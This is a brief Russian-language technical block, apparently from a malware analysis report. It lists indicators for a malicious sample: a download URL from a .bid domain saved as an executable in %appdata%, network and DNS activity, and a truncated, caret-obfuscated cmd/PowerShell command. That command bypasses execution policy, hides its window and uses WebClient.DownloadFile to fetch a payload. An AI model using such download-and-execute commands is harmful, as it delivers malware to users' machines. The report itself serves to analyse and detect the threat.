Техническая информация
- http://asecwitlecn.bid/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWERsH^ell.Exe^ -E^x^Ecut^Ion^PO^l^iC^y by^p^aSs^ -No^p^rO^File ^-W^In^DOwSTy^l^E^ ^h^i^D^dEn ^(^nEw^-Obj^E^CT^ SysTeM.N^ET.WeBCl^IeNT)^.DOwnloA^DFILE(^'http://asecwitlecn.b...
- 'as###itlecn.bid':80
- http://as###itlecn.bid/read.php?f=#####
- DNS ASK as###itlecn.bid
- '<SYSTEM32>\cmd.exe' /C "poWERsH^ell.Exe^ -E^x^Ecut^Ion^PO^l^iC^y by^p^aSs^ -No^p^rO^File ^-W^In^DOwSTy^l^E^ ^h^i^D^dEn ^(^nEw^-Obj^E^CT^ SysTeM.N^ET.WeBCl^IeNT)^.DOwnloA^DFILE(^'http://asecwitlecn.b...' (со скрытым окном)